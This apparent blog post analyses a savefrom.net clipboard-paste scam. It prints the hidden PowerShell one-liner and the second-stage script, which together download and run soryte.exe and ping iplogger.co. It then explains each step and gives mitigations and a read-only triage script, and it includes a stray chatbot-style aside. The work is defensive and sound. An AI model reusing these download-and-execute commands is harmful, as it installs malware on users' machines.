How I uncovered the savefrom.net YouTube video downloading scam

Md. Mahim Bin Firoj
3 min read, Jan 16, 2025


How many of you download YouTube videos from savefrom.net? Please stop now, and if you have already done it, it is time to clean your system of malware.

While you are downloading a video, the site first shows an instruction on your screen telling you to type:

Windows key + R to open the Run dialog, then
Ctrl+V to paste.

Up to this point the user stopped and called me to check what was going on. Then I started to investigate. When you press Ctrl+V, the PowerShell command below (which the site has already placed on your clipboard) is pasted into the Run box; if you then press Enter by mistake, it executes. Here is what happens next.

powershell.exe -W Hidden -command  $uR='https://dirol-netrol.com/poimi/toto.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t

When you open the dirol-netrol link, you will see a whole batch of PowerShell commands:

Invoke-WebRequest -Uri 'https://iplogger.co/1EccL4'
$hvocuh = "$env:ALLUSERSPROFILE\golbus"
if (!(Test-Path $hvocuh)) { New-Item -Path $hvocuh -ItemType Directory }
$jvnsuej = "$env:ALLUSERSPROFILE\maram.zip"
$yfnyich = 'https://ment-sema.com/lumsa.zip'
$umchshyf = Join-Path $hvocuh 'soryte.exe'
Invoke-WebRequest -Uri $yfnyich -OutFile $jvnsuej
Invoke-WebRequest -Uri 'https://iplogger.co/1EwuL4'
Expand-Archive -Path $jvnsuej -DestinationPath $hvocuh -Force
Start-Process -FilePath $umchshyf
Remove-Item $jvnsuej -Force
Start-Process -FilePath $umchshyf

First Code Snippet:

powershell.exe -W Hidden -command $uR='https://dirol-netrol.com/poimi/toto.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t

-W Hidden: Runs PowerShell with a hidden window, so the user never sees a console and the whole thing stays stealthy.

$uR='https://dirol-netrol.com/poimi/toto.txt': Defines the URL that hosts the second-stage PowerShell script.

$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing: Downloads toto.txt and stores the response in $reS; -UseBasicParsing skips the Internet Explorer HTML parser so the request works on any machine. The next statement copies the response body ($reS.Content) into $t.

iex $t: Invoke-Expression runs the downloaded text as PowerShell code. This is the remote code execution step: whatever the attacker serves at that URL, now or later, runs on the machine.

Second Code Snippet (Downloaded Content):

Invoke-WebRequest -Uri 'https://iplogger.co/1EccL4'

Purpose: Sends a request to an IP logger, likely to track the victim’s IP address.

$hvocuh = "$env:ALLUSERSPROFILE\golbus"
if (!(Test-Path $hvocuh)) { New-Item -Path $hvocuh -ItemType Directory }

Purpose:
Creates a directory named golbus under $env:ALLUSERSPROFILE (C:\ProgramData on a standard install) if it does not already exist.
C:\ProgramData is writable without administrator rights and rarely inspected by users, which is why malware often uses it to stage its files.

$jvnsuej = "$env:ALLUSERSPROFILE\maram.zip"
$yfnyich = 'https://ment-sema.com/lumsa.zip'
$umchshyf = Join-Path $hvocuh 'soryte.exe'

Variables:
$jvnsuej: path of the downloaded ZIP file (maram.zip) in C:\ProgramData.
$yfnyich: URL of the ZIP file to download (lumsa.zip).
$umchshyf: final path of the extracted executable (soryte.exe), i.e. C:\ProgramData\golbus\soryte.exe.

Invoke-WebRequest -Uri $yfnyich -OutFile $jvnsuej

Purpose: Downloads the ZIP file from https://ment-sema.com/lumsa.zip and saves it as maram.zip in C:\ProgramData.

Invoke-WebRequest -Uri 'https://iplogger.co/1EwuL4'

Purpose: Sends another request to a different IP logger for additional tracking.

Expand-Archive -Path $jvnsuej -DestinationPath $hvocuh -Force

Purpose: Extracts the contents of the ZIP file (maram.zip) to the golbus directory.

Start-Process -FilePath $umchshyf

Purpose: Executes the extracted file (soryte.exe). This is highly suspicious as the file’s purpose is unknown and could be malware.

Remove-Item $jvnsuej -Force

Purpose: Deletes the downloaded ZIP file (maram.zip) to cover tracks.

Start-Process -FilePath $umchshyf

Purpose: Runs the executable (soryte.exe) again, possibly ensuring persistence or starting its malicious payload.

Mitigation Steps:

Disconnect the System:
Immediately disconnect the system from the network to prevent further communication with the attacker’s servers.

Delete Malicious Files:
Look for and remove suspicious files in C:\ProgramData\golbus and other system directories.

Scan for Malware:
Run a full system scan with a trusted antivirus or antimalware tool. Use my link below to download a free AV and start cleaning.

Block URLs:
Block dirol-netrol.com, ment-sema.com, and iplogger.co at the firewall level.

Inspect the System:
Check for unusual processes, scheduled tasks, or startup programs related to soryte.exe using the Autoruns tool from Microsoft Sysinternals.

Reinstall the OS (if compromised):
If the system's integrity cannot be guaranteed, consider reinstalling the operating system.

Let me know if you'd like more specific guidance!
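To check a Windows machine for traces of this campaign, here is a read-only PowerShell triage script I have added; it is not from the original post. It assumes the indicator values quoted above (dirol-netrol.com, ment-sema.com, iplogger.co, the golbus folder and soryte.exe), a Windows 10/11 host, and PowerShell script-block logging being enabled; the function name Get-ClickFixFindings is my own.

```powershell
# Added triage script (not from the original post). Read-only: it reports, it
# does not delete. Run from an elevated PowerShell prompt.
$Indicators = @('dirol-netrol.com', 'ment-sema.com', 'iplogger.co', 'soryte.exe', 'golbus')

function Get-ClickFixFindings {
    $findings = @()

    # 1. Run-dialog history: RunMRU keeps the last commands entered into Win+R,
    #    so the pasted one-liner is usually still recorded here.
    $mru = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
    if ($mru) {
        $mru.PSObject.Properties |
            Where-Object { $_.Name -ne 'MRUList' -and $_.Name -notlike 'PS*' -and
                           $_.Value -match 'powershell.*(-W\s+Hidden|iex|Invoke-WebRequest)' } |
            ForEach-Object { $findings += "RunMRU entry: $($_.Value)" }
    }

    # 2. Drop directory and payload under %ALLUSERSPROFILE% (C:\ProgramData).
    $dropDir = Join-Path $env:ALLUSERSPROFILE 'golbus'
    if (Test-Path $dropDir) {
        $findings += "Drop directory exists: $dropDir"
        Get-ChildItem $dropDir -File -ErrorAction SilentlyContinue |
            ForEach-Object { $findings += "Dropped file: $($_.FullName) ($($_.Length) bytes)" }
    }

    # 3. Autostart locations (Run keys, scheduled tasks) that reference the payload.
    foreach ($key in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
        $props = Get-ItemProperty $key -ErrorAction SilentlyContinue
        if ($props) {
            $props.PSObject.Properties | Where-Object { $_.Value -match 'soryte\.exe|golbus' } |
                ForEach-Object { $findings += "Run key $key\$($_.Name): $($_.Value)" }
        }
    }
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match 'soryte\.exe|golbus' } |
        ForEach-Object { $findings += "Scheduled task: $($_.TaskName)" }

    # 4. PowerShell script-block log (event 4104) entries that mention the indicators.
    $pattern = ($Indicators | ForEach-Object { [regex]::Escape($_) }) -join '|'
    Get-WinEvent -FilterHashtable @{LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104} -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $pattern } |
        ForEach-Object { $findings += "Script-block log $($_.TimeCreated): indicator matched" }

    return $findings
}

$result = Get-ClickFixFindings
if ($result.Count -eq 0) { 'No indicators from this campaign found.' } else { $result }
```

Anything the script lists is a lead for the Autoruns and AV steps above, not proof on its own; a RunMRU hit shows the command was pasted even if the payload has since been removed.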

Thanks. I hope this blog helps you stop downloading YouTube videos from this site from now on. If you found it helpful, please consider subscribing below and sharing it with your network to protect others.

LinkedIn:

https://www.linkedin.com/in/md-mahimbin-firoj-7b8a5a113/

YouTube:

https://www.youtube.com/@mahimfiroj1802/videos
